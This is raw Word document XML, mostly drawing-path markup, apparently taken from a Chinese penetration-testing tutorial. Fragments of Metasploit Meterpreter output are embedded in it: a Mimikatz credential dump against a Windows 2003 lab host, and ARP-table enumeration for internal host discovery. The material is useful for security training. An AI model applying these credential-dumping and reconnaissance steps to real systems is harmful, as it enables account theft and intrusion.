1975,15087,1975,15085,1975,15084,1975,15083,1975,15081,1975,15080,1975,15079,1975,15077,1975,15076,1975,15074,1975,15072,1975,15071,1975,15069,1975,15067,1975,15065,1975,15063,1975,15061,1975,15059,1975,15057,1975,15055,1975,15052,1975,15050,1975,15048,1975,15045,1975,15043,1975,15040,1975,15037,1975,15035,1975,15032,1975,15029,1975,15026,1975,15023,1975,15020,1975,15017,1975,15014,1975,15010,1975,15007,1975,15003,1975,15000,1975,14996,1975,14993,1975,14989,1975,14985,1975,14981,1975,14977,1975,14973,1975,14968,1975,14964,1975,14960,1975,14955,1975,14951,1975,14946,1975,14941,1975,14936,1975,14931,1975,14926,1975,14921,1975,14916,1975,14911,1975,14905,1975,14900,1975,14894,1975,14888,1975,14882,1975,14876,1975,14870,1975,14864,1975,14858,1975,14851e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:759.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,15190" coordsize="130,270">
        <v:shape style="position:absolute;left:1950;top:15190;width:130;height:270" coordorigin="1950,15190" coordsize="130,270" path="m1975,15212l1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1975,15212,1976,15212,1976,15212,1976,15212,1976,15212,1976,15212,1976,15212,1976,15212,1976,15212,1977,15212,1977,15212,1977,15212,1977,15212,1977,15212,1978,15212,1978,15212,1978,15212,1978,15212,1979,15212,1979,15212,1979,15212,1980,15212,1980,15212,1980,15212,1981,15212,1981,15212,1981,15212,1982,15212,1982,15212,1983,15212,1983,15212,1984,15212,1984,15212,1985,15212,1986,15212,1986,15212,1987,15212,1988,15212,1988,15212,1989,15212,1990,15212,1990,15212,1991,15212,1992,15212,1993,15212,1994,15212,1995,15212,1995,15212,1996,15212,1997,15212,1998,15212,1999,15212,2000,15212,2002,15212,2003,15212,2004,15212,2005,15212,2006,15212,2008,15212,2009,15212,2010,15212,2011,15212,2013,15212,2014,15212,2016,15212,2017,15212,2019,15212,2020,15212,2022,15212,2024,15212,2025,15212,2027,15212,2029,15212,2030,15212,2032,15212,2034,15212,2036,15212,2038,15212,2040,15212,2042,15212,2044,15212,2046,15212,2048,15212,2051,15212,2053,15212,2055,15212,2057,15212,2060,15212,2062,15212,2065,15212,2067,15212,2070,15212,2072,15212,2075,15212,2078,15212,2081,15212,2083,15212,2086,15212,2089,15212,2092,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15213,2095,15213,2095,15213,2095,15213,2095,15213,2095,15214,2095,15214,2095,15214,2095,15214,2095,15215,2095,15215,2095,15215,2095,15216,2095,15216,2095,15217,2095,15217,2095,15218,2095,15218,2095,15219,2095,15219,2095,15220,2095,15221,2095,15221,2095,15222,2095,15223,2095,15224,2095,15225,2095,15225,2095,15226,2095,15227,2095,15228,2095,15229,2095,15231,2095,15232,2095,15233,2095,15234,2095,15236,2095,15237,2095,15238,2095,15240,2095,15241,2095,15243,2095,15244,2095,15246,2095,15248,2095,15250,2095,15251,2095,15253,2095,15255,2095,15257,2095,15259,2095,15261,2095,15264,2095,15266,2095,15268,2095,15271,2095,15273,2095,15276,2095,15278,2095,15281,2095,15284,2095,15286,2095,15289,2095,15292,2095,15295,2095,15298,2095,15301,2095,15305,2095,15308,2095,15311,2095,15315,2095,15318,2095,15322,2095,15326,2095,15330,2095,15333,2095,15337,2095,15341,2095,15346,2095,15350,2095,15354,2095,15359,2095,15363,2095,15368,2095,15372,2095,15377,2095,15382,2095,15387,2095,15392,2095,15397,2095,15402,2095,15408,2095,15413,2095,15419,2095,15424,2095,15430,2095,15436,2095,15442,2095,15448,2095,15454,2095,15460,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2094,15467,2094,15467,2094,15467,2094,15467,2094,15467,2094,15467,2094,15467,2094,15467,2093,15467,2093,15467,2093,15467,2093,15467,2093,15467,2092,15467,2092,15467,2092,15467,2092,15467,2091,15467,2091,15467,2091,15467,2090,15467,2090,15467,2090,15467,2089,15467,2089,15467,2089,15467,2088,15467,2088,15467,2087,15467,2087,15467,2086,15467,2086,15467,2085,15467,2084,15467,2084,15467,2083,15467,2083,15467,2082,15467,2081,15467,2080,15467,2080,15467,2079,15467,2078,15467,2077,15467,2076,15467,2075,15467,2075,15467,2074,15467,2073,15467,2072,15467,2071,15467,2070,15467,2068,15467,2067,15467,2066,15467,2065,15467,2064,15467,2063,15467,2061,15467,2060,15467,2059,15467,2057,15467,2056,15467,2054,15467,2053,15467,2051,15467,2050,15467,2048,15467,2047,15467,2045,15467,2043,15467,2041,15467,2040,15467,2038,15467,2036,15467,2034,15467,2032,15467,2030,15467,2028,15467,2026,15467,2024,15467,2022,15467,2019,15467,2017,15467,2015,15467,2013,15467,2010,15467,2008,15467,2005,15467,2003,15467,2000,15467,1998,15467,1995,15467,1992,15467,1990,15467,1987,15467,1984,15467,1981,15467,1978,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15467,1975,15466,1975,15466,1975,15466,1975,15466,1975,15466,1975,15466,1975,15466,1975,15466,1975,15465,1975,15465,1975,15465,1975,15465,1975,15464,1975,15464,1975,15464,1975,15463,1975,15463,1975,15463,1975,15462,1975,15462,1975,15461,1975,15461,1975,15460,1975,15460,1975,15459,1975,15458,1975,15458,1975,15457,1975,15456,1975,15456,1975,15455,1975,15454,1975,15453,1975,15452,1975,15451,1975,15450,1975,15449,1975,15448,1975,15447,1975,15446,1975,15444,1975,15443,1975,15442,1975,15440,1975,15439,1975,15437,1975,15436,1975,15434,1975,15432,1975,15431,1975,15429,1975,15427,1975,15425,1975,15423,1975,15421,1975,15419,1975,15417,1975,15415,1975,15413,1975,15410,1975,15408,1975,15405,1975,15403,1975,15400,1975,15398,1975,15395,1975,15392,1975,15389,1975,15386,1975,15383,1975,15380,1975,15377,1975,15374,1975,15370,1975,15367,1975,15364,1975,15360,1975,15356,1975,15353,1975,15349,1975,15345,1975,15341,1975,15337,1975,15333,1975,15329,1975,15324,1975,15320,1975,15315,1975,15311,1975,15306,1975,15301,1975,15296,1975,15292,1975,15286,1975,15281,1975,15276,1975,15271,1975,15265,1975,15260,1975,15254,1975,15248,1975,15242,1975,15237,1975,15230,1975,15224,1975,15218,1975,15212e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:759.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,15190" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:15190;width:130;height:270" coordorigin="2070,15190" coordsize="130,270" path="m2095,15212l2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2095,15212,2096,15212,2096,15212,2096,15212,2096,15212,2096,15212,2096,15212,2096,15212,2096,15212,2096,15212,2097,15212,2097,15212,2097,15212,2097,15212,2097,15212,2098,15212,2098,15212,2098,15212,2098,15212,2099,15212,2099,15212,2099,15212,2100,15212,2100,15212,2100,15212,2101,15212,2101,15212,2102,15212,2102,15212,2102,15212,2103,15212,2103,15212,2104,15212,2105,15212,2105,15212,2106,15212,2106,15212,2107,15212,2108,15212,2108,15212,2109,15212,2110,15212,2110,15212,2111,15212,2112,15212,2113,15212,2114,15212,2115,15212,2116,15212,2116,15212,2117,15212,2118,15212,2119,15212,2121,15212,2122,15212,2123,15212,2124,15212,2125,15212,2126,15212,2128,15212,2129,15212,2130,15212,2132,15212,2133,15212,2134,15212,2136,15212,2137,15212,2139,15212,2140,15212,2142,15212,2144,15212,2145,15212,2147,15212,2149,15212,2151,15212,2152,15212,2154,15212,2156,15212,2158,15212,2160,15212,2162,15212,2164,15212,2166,15212,2168,15212,2171,15212,2173,15212,2175,15212,2178,15212,2180,15212,2182,15212,2185,15212,2187,15212,2190,15212,2192,15212,2195,15212,2198,15212,2201,15212,2203,15212,2206,15212,2209,15212,2212,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15212,2215,15213,2215,15213,2215,15213,2215,15213,2215,15213,2215,15214,2215,15214,2215,15214,2215,15214,2215,15215,2215,15215,2215,15215,2215,15216,2215,15216,2215,15217,2215,15217,2215,15218,2215,15218,2215,15219,2215,15219,2215,15220,2215,15221,2215,15221,2215,15222,2215,15223,2215,15224,2215,15225,2215,15225,2215,15226,2215,15227,2215,15228,2215,15229,2215,15231,2215,15232,2215,15233,2215,15234,2215,15236,2215,15237,2215,15238,2215,15240,2215,15241,2215,15243,2215,15244,2215,15246,2215,15248,2215,15250,2215,15251,2215,15253,2215,15255,2215,15257,2215,15259,2215,15261,2215,15264,2215,15266,2215,15268,2215,15271,2215,15273,2215,15276,2215,15278,2215,15281,2215,15284,2215,15286,2215,15289,2215,15292,2215,15295,2215,15298,2215,15301,2215,15305,2215,15308,2215,15311,2215,15315,2215,15318,2215,15322,2215,15326,2215,15330,2215,15333,2215,15337,2215,15341,2215,15346,2215,15350,2215,15354,2215,15359,2215,15363,2215,15368,2215,15372,2215,15377,2215,15382,2215,15387,2215,15392,2215,15397,2215,15402,2215,15408,2215,15413,2215,15419,2215,15424,2215,15430,2215,15436,2215,15442,2215,15448,2215,15454,2215,15460,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2215,15467,2214,15467,2214,15467,2214,15467,2214,15467,2214,15467,2214,15467,2214,15467,2214,15467,2213,15467,2213,15467,2213,15467,2213,15467,2213,15467,2212,15467,2212,15467,2212,15467,2212,15467,2211,15467,2211,15467,2211,15467,2210,15467,2210,15467,2209,15467,2209,15467,2209,15467,2208,15467,2208,15467,2207,15467,2207,15467,2206,15467,2206,15467,2205,15467,2205,15467,2204,15467,2203,15467,2203,15467,2202,15467,2201,15467,2200,15467,2200,15467,2199,15467,2198,15467,2197,15467,2196,15467,2196,15467,2195,15467,2194,15467,2193,15467,2192,15467,2191,15467,2190,15467,2189,15467,2187,15467,2186,15467,2185,15467,2184,15467,2183,15467,2181,15467,2180,15467,2179,15467,2177,15467,2176,15467,2174,15467,2173,15467,2171,15467,2170,15467,2168,15467,2167,15467,2165,15467,2163,15467,2161,15467,2160,15467,2158,15467,2156,15467,2154,15467,2152,15467,2150,15467,2148,15467,2146,15467,2144,15467,2142,15467,2140,15467,2137,15467,2135,15467,2133,15467,2130,15467,2128,15467,2125,15467,2123,15467,2120,15467,2118,15467,2115,15467,2112,15467,2110,15467,2107,15467,2104,15467,2101,15467,2098,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15467,2095,15466,2095,15466,2095,15466,2095,15466,2095,15466,2095,15466,2095,15466,2095,15466,2095,15465,2095,15465,2095,15465,2095,15465,2095,15464,2095,15464,2095,15464,2095,15463,2095,15463,2095,15463,2095,15462,2095,15462,2095,15461,2095,15461,2095,15460,2095,15460,2095,15459,2095,15458,2095,15458,2095,15457,2095,15456,2095,15456,2095,15455,2095,15454,2095,15453,2095,15452,2095,15451,2095,15450,2095,15449,2095,15448,2095,15447,2095,15446,2095,15444,2095,15443,2095,15442,2095,15440,2095,15439,2095,15437,2095,15436,2095,15434,2095,15432,2095,15431,2095,15429,2095,15427,2095,15425,2095,15423,2095,15421,2095,15419,2095,15417,2095,15415,2095,15413,2095,15410,2095,15408,2095,15405,2095,15403,2095,15400,2095,15398,2095,15395,2095,15392,2095,15389,2095,15386,2095,15383,2095,15380,2095,15377,2095,15374,2095,15370,2095,15367,2095,15364,2095,15360,2095,15356,2095,15353,2095,15349,2095,15345,2095,15341,2095,15337,2095,15333,2095,15329,2095,15324,2095,15320,2095,15315,2095,15311,2095,15306,2095,15301,2095,15296,2095,15292,2095,15286,2095,15281,2095,15276,2095,15271,2095,15265,2095,15260,2095,15254,2095,15248,2095,15242,2095,15237,2095,15230,2095,15224,2095,15218,2095,1521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9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core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"mimikatz"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0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80053"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true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mimikatz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3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#&lt;Rex::Post::Meterpreter::Extensions::Mimikatz::Mimikatz:0x000055ae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e91ceb28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@client=#&lt;Session:meterpreter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192.168.1.119:53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(192.168.1.119)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"WIN03X64\Administrator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15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@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WIN03X64"&gt;,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@name="mimikatz"&gt;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mimikatz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kerberos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{:authid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"0;996"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:package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"Negotiate"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user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"NETWORK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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SERVICE"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:domain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AUTHORITY"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:password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"mod_process::getVeryBasicM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odulesListForProcess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12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(0x0000012b)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\xC5\x8C\x10\xE8\x06\x84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ReadProcessM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emory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\x16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WriteProcessMemory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\xF7B\x02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\nn.a.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(kerberos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KO)"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}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{:authid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"0;44482"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:package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"NTLM"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:domain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:password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"mod_process::getVeryBasicModulesListForProcess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23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(0x0000012b)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\xC5\x8C\x10\xE8\x06\x84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ReadProcessMemory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\x16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WriteProcessMemory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\xF7B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\x02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\nn.a.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(kerberos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KO)"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{:authid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"0;115231"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:package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"NTLM"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r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"Administrator"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:domain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"WIN03X64"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:password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"mod_process::getVery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BasicModulesListForProcess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1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(0x0000012b)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\xC5\x8C\x10\xE8\x06\x84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ReadP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ocessMemory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\x16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WriteProcessMemory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\xF7B\x02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\nn.a.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(kerberos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KO)"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{:a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uthid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"0;997"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:package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"Negotiate"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"LOCAL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SERVICE"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:domain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AUTHORITY"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:password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"mod_process::getVeryBasicModulesList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ForProcess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(0x0000012b)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\xC5\x8C\x10\xE8\x06\x84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ReadProcessMemory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\x16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WriteProcessMemory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\xF7B\x02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\nn.a.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(kerberos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KO)"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}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{:authid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"0;999"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package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"NTLM"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user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"WIN03X64$"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:domain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"WORKGROUP"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:password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"mo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d_process::getVeryBasicModulesListForProcess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2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(0x0000012b)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\xC5\x8C\x10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\xE8\x06\x84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ReadProcessMemory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\x16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WriteProcessMemory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\xF7B\x02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\nn.a.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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(kerberos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KO)"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}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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="8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内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网主机发现，如路由，arp等：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arp_table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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28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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Net::Arp:0x000055aee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7f5f6b8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@ip_addr="192.168.1.1",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@mac_addr="78:44:fd:8e:91:59",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@interface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="65539"&gt;,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-48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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Net::Arp:0x00005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5aee7f5ee20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@ip_addr="192.168.1.3",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@mac_addr="28:16:ad:3b:51:78",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@inte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fa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ce="65539"&gt;]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arp_table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ip_addr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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"192.168.1.1"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arp_table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mac_addr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1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"78:44:fd:8e:91:59"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371.161pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,7423">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:7423" coordorigin="10402,0" coordsize="0,7423" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,9,10402,12,10402,14,10402,18,10402,21,10402,25,10402,30,10402,35,10402,40,10402,46,10402,53,10402,60,10402,68,10402,77,10402,86,10402,96,10402,107,10402,118,10402,131,10402,144,10402,158,10402,173,10402,188,10402,205,10402,223,10402,241,10402,261,10402,281,10402,303,10402,326,10402,350,10402,375,10402,401,10402,428,10402,457,10402,487,10402,518,10402,550,10402,584,10402,619,10402,655,10402,693,10402,732,10402,773,10402,815,10402,859,10402,904,10402,951,10402,999,10402,1049,10402,1101,10402,1154,10402,1209,10402,1266,10402,1324,10402,1385,10402,1447,10402,1510,10402,1576,10402,1644,10402,1713,10402,1785,10402,1858,10402,1933,10402,2011,10402,2090,10402,2171,10402,2255,10402,2341,10402,2428,10402,2518,10402,2610,10402,2705,10402,2801,10402,2900,10402,3001,10402,3105,10402,3211,10402,3319,10402,3430,10402,3543,10402,3658,10402,3776,10402,3897,10402,4020,10402,4146,10402,4274,10402,4405,10402,4538,10402,4674,10402,4813,10402,4955,10402,5099,10402,5246,10402,5396,10402,5549,10402,5704,10402,5863,10402,6024,10402,6188,10402,6356,10402,6526,10402,6699,10402,6875,10402,7055,10402,7237,10402,7423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7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999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999l1517,999,1517,999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7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248.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="8990,4970">
        <v:shape style="position:absolute;left:1490;top:2090;width:8990;height:4970" coordorigin="1490,2090" coordsize="8990,49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1,10484,2111,10484,2112,10484,2112,10484,2113,10484,2114,10484,2115,10484,2117,10484,2118,10484,2120,10484,2122,10484,2124,10484,2127,10484,2130,10484,2134,10484,2137,10484,2141,10484,2146,10484,2151,10484,2156,10484,2162,10484,2168,10484,2175,10484,2182,10484,2189,10484,2198,10484,2206,10484,2216,10484,2226,10484,2236,10484,2247,10484,2259,10484,2271,10484,2284,10484,2298,10484,2313,10484,2328,10484,2344,10484,2360,10484,2378,10484,2396,10484,2415,10484,2435,10484,2456,10484,2477,10484,2500,10484,2523,10484,2548,10484,2573,10484,2599,10484,2626,10484,2654,10484,2683,10484,2714,10484,2745,10484,2777,10484,2810,10484,2845,10484,2880,10484,2917,10484,2955,10484,2994,10484,3034,10484,3076,10484,3118,10484,3162,10484,3207,10484,3253,10484,3301,10484,3350,10484,3400,10484,3452,10484,3505,10484,3559,10484,3615,10484,3672,10484,3730,10484,3790,10484,3852,10484,3915,10484,3979,10484,4045,10484,4113,10484,4182,10484,4253,10484,4325,10484,4399,10484,4474,10484,4551,10484,4630,10484,4710,10484,4792,10484,4876,10484,4962,10484,5049,10484,5138,10484,5229,10484,5321,10484,5416,10484,5512,10484,5610,10484,5710,10484,5812,10484,5916,10484,6022,10484,6129,10484,6239,10484,6351,10484,6464,10484,6580,10484,6697,10484,6817,10484,6939,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10483,7063,10482,7063,10482,7063,10480,7063,10479,7063,10477,7063,10475,7063,10473,7063,10470,7063,10466,7063,10462,7063,10458,7063,10453,7063,10448,7063,10442,7063,10435,7063,10428,7063,10419,7063,10411,7063,10401,7063,10391,7063,10379,7063,10367,7063,10354,7063,10340,7063,10326,7063,10310,7063,10293,7063,10275,7063,10256,7063,10236,7063,10215,7063,10192,7063,10168,7063,10143,7063,10117,7063,10090,7063,10061,7063,10031,7063,9999,7063,9966,7063,9931,7063,9895,7063,9858,7063,9819,7063,9778,7063,9735,7063,9691,7063,9646,7063,9598,7063,9549,7063,9498,7063,9445,7063,9391,7063,9334,7063,9275,7063,9215,7063,9153,7063,9088,7063,9022,7063,8953,7063,8883,7063,8810,7063,8735,7063,8658,7063,8578,7063,8497,7063,8413,7063,8326,7063,8238,7063,8146,7063,8053,7063,7957,7063,7859,7063,7758,7063,7654,7063,7548,7063,7439,7063,7328,7063,7214,7063,7097,7063,6977,7063,6855,7063,6730,7063,6602,7063,6471,7063,6337,7063,6201,7063,6061,7063,5918,7063,5773,7063,5624,7063,5472,7063,5317,7063,5159,7063,4997,7063,4833,7063,4665,7063,4494,7063,4319,7063,4141,7063,3960,7063,3776,7063,3587,7063,3396,7063,3201,7063,3002,7063,2800,7063,2594,7063,2385,7063,2172,7063,1955,7063,1734,7063,1510,7063,1510,7063,1510,7063,1510,7063,1510,7062,1510,7062,1510,7062,1510,7062,1510,7062,1510,7061,1510,7060,1510,7060,1510,7059,1510,7057,1510,7056,1510,7054,1510,7053,1510,7051,1510,7048,1510,7045,1510,7042,1510,7039,1510,7035,1510,7031,1510,7027,1510,7022,1510,7017,1510,7011,1510,7005,1510,6998,1510,6991,1510,6983,1510,6975,1510,6966,1510,6957,1510,6947,1510,6937,1510,6925,1510,6914,1510,6901,1510,6888,1510,6874,1510,6860,1510,6845,1510,6829,1510,6812,1510,6795,1510,6776,1510,6757,1510,6738,1510,6717,1510,6695,1510,6673,1510,6649,1510,6625,1510,6600,1510,6574,1510,6546,1510,6518,1510,6489,1510,6459,1510,6428,1510,6395,1510,6362,1510,6328,1510,6292,1510,6255,1510,6218,1510,6179,1510,6138,1510,6097,1510,6055,1510,6011,1510,5966,1510,5919,1510,5872,1510,5823,1510,5772,1510,5721,1510,5668,1510,5614,1510,5558,1510,5501,1510,5442,1510,5382,1510,5321,1510,5258,1510,5193,1510,5127,1510,5060,1510,4991,1510,4920,1510,4848,1510,4774,1510,4699,1510,4622,1510,4543,1510,4462,1510,4380,1510,4296,1510,4211,1510,4124,1510,4035,1510,3944,1510,3851,1510,3757,1510,3660,1510,3562,1510,3462,1510,3360,1510,3257,1510,3151,1510,3043,1510,2934,1510,2822,1510,2708,1510,2593,1510,2475,1510,2356,1510,2234,1510,2110e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:104.500pt;width:1.500pt;height:248.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="30,4970">
        <v:shape style="position:absolute;left:1490;top:2090;width:30;height:4970" coordorigin="1490,2090" coordsize="30,4970" path="m1517,2110l1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2111,1517,2111,1517,2112,1517,2112,1517,2113,1517,2114,1517,2115,1517,2117,1517,2118,1517,2120,1517,2122,1517,2124,1517,2127,1517,2130,1517,2134,1517,2137,1517,2141,1517,2146,1517,2151,1517,2156,1517,2162,1517,2168,1517,2175,1517,2182,1517,2189,1517,2198,1517,2206,1517,2216,1517,2226,1517,2236,1517,2247,1517,2259,1517,2271,1517,2284,1517,2298,1517,2313,1517,2328,1517,2344,1517,2360,1517,2378,1517,2396,1517,2415,1517,2435,1517,2456,1517,2477,1517,2500,1517,2523,1517,2548,1517,2573,1517,2599,1517,2626,1517,2654,1517,2683,1517,2714,1517,2745,1517,2777,1517,2810,1517,2845,1517,2880,1517,2917,1517,2955,1517,2994,1517,3034,1517,3076,1517,3118,1517,3162,1517,3207,1517,3253,1517,3301,1517,3350,1517,3400,1517,3452,1517,3505,1517,3559,1517,3615,1517,3672,1517,3730,1517,3790,1517,3852,1517,3915,1517,3979,1517,4045,1517,4113,1517,4182,1517,4253,1517,4325,1517,4399,1517,4474,1517,4551,1517,4630,1517,4710,1517,4792,1517,4876,1517,4962,1517,5049,1517,5138,1517,5229,1517,5321,1517,5416,1517,5512,1517,5610,1517,5710,1517,5812,1517,5916,1517,6022,1517,6129,1517,6239,1517,6351,1517,6464,1517,6580,1517,6697,1517,6817,1517,6939,1517,7063e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:352.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7050" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:7050;width:8990;height:370" coordorigin="1490,7050" coordsize="8990,370" path="m1510,7063l1510,7063,1510,7063,1510,7063,1510,7063,1510,7063,1510,7063,1511,7063,1512,7063,1512,7063,1514,7063,1515,7063,1517,7063,1519,7063,1521,7063,1524,7063,1528,7063,1532,7063,1536,7063,1541,7063,1546,7063,1552,7063,1559,7063,1566,7063,1575,7063,1583,7063,1593,7063,1603,7063,1615,7063,1627,7063,1640,7063,1654,7063,1668,7063,1684,7063,1701,7063,1719,7063,1738,7063,1758,7063,1780,7063,1802,7063,1826,7063,1851,7063,1877,7063,1904,7063,1933,7063,1963,7063,1995,7063,2028,7063,2063,7063,2099,7063,2136,7063,2175,7063,2216,7063,2259,7063,2303,7063,2348,7063,2396,7063,2445,7063,2496,7063,2549,7063,2604,7063,2660,7063,2719,7063,2779,7063,2841,7063,2906,7063,2972,7063,3041,7063,3112,7063,3184,7063,3259,7063,3336,7063,3416,7063,3498,7063,3582,7063,3668,7063,3757,7063,3848,7063,3941,7063,4037,7063,4136,7063,4236,7063,4340,7063,4446,7063,4555,7063,4666,7063,4780,7063,4897,7063,5017,7063,5139,7063,5264,7063,5392,7063,5523,7063,5657,7063,5793,7063,5933,7063,6076,7063,6222,7063,6370,7063,6522,7063,6677,7063,6835,7063,6997,7063,7161,7063,7329,7063,7500,7063,7675,7063,7853,7063,8034,7063,8219,7063,8407,7063,8598,7063,8793,7063,8992,7063,9194,7063,9400,7063,9609,7063,9823,7063,10039,7063,10260,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7063,10484,7064,10484,7064,10484,7064,10484,7064,10484,7065,10484,7065,10484,7065,10484,7066,10484,7066,10484,7066,10484,7067,10484,7067,10484,7068,10484,7068,10484,7069,10484,7070,10484,7070,10484,7071,10484,7072,10484,7073,10484,7073,10484,7074,10484,7075,10484,7076,10484,7077,10484,7078,10484,7080,10484,7081,10484,7082,10484,7083,10484,7085,10484,7086,10484,7088,10484,7089,10484,7091,10484,7093,10484,7094,10484,7096,10484,7098,10484,7100,10484,7102,10484,7104,10484,7106,10484,7109,10484,7111,10484,7113,10484,7116,10484,7119,10484,7121,10484,7124,10484,7127,10484,7130,10484,7133,10484,7136,10484,7139,10484,7142,10484,7146,10484,7149,10484,7153,10484,7156,10484,7160,10484,7164,10484,7168,10484,7172,10484,7176,10484,7180,10484,7185,10484,7189,10484,7194,10484,7199,10484,7203,10484,7208,10484,7213,10484,7218,10484,7224,10484,7229,10484,7234,10484,7240,10484,7246,10484,7252,10484,7258,10484,7264,10484,7270,10484,7276,10484,7283,10484,7289,10484,7296,10484,7303,10484,7310,10484,7317,10484,7324,10484,7332,10484,7339,10484,7347,10484,7355,10484,7363,10484,7371,10484,7379,10484,7388,10484,7396,10484,7405,10484,7414,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10483,7423,10482,7423,10482,7423,10480,7423,10479,7423,10477,7423,10475,7423,10473,7423,10470,7423,10466,7423,10462,7423,10458,7423,10453,7423,10448,7423,10442,7423,10435,7423,10428,7423,10419,7423,10411,7423,10401,7423,10391,7423,10379,7423,10367,7423,10354,7423,10340,7423,10326,7423,10310,7423,10293,7423,10275,7423,10256,7423,10236,7423,10215,7423,10192,7423,10168,7423,10143,7423,10117,7423,10090,7423,10061,7423,10031,7423,9999,7423,9966,7423,9931,7423,9895,7423,9858,7423,9819,7423,9778,7423,9735,7423,9691,7423,9646,7423,9598,7423,9549,7423,9498,7423,9445,7423,9391,7423,9334,7423,9275,7423,9215,7423,9153,7423,9088,7423,9022,7423,8953,7423,8883,7423,8810,7423,8735,7423,8658,7423,8578,7423,8497,7423,8413,7423,8326,7423,8238,7423,8146,7423,8053,7423,7957,7423,7859,7423,7758,7423,7654,7423,7548,7423,7439,7423,7328,7423,7214,7423,7097,7423,6977,7423,6855,7423,6730,7423,6602,7423,6471,7423,6337,7423,6201,7423,6061,7423,5918,7423,5773,7423,5624,7423,5472,7423,5317,7423,5159,7423,4997,7423,4833,7423,4665,7423,4494,7423,4319,7423,4141,7423,3960,7423,3776,7423,3587,7423,3396,7423,3201,7423,3002,7423,2800,7423,2594,7423,2385,7423,2172,7423,1955,7423,1734,7423,1510,7423,1510,7423,1510,7423,1510,7423,1510,7423,1510,7423,1510,7423,1510,7423,1510,7423,1510,7423,1510,7423,1510,7423,1510,7422,1510,7422,1510,7422,1510,7422,1510,7422,1510,7422,1510,7422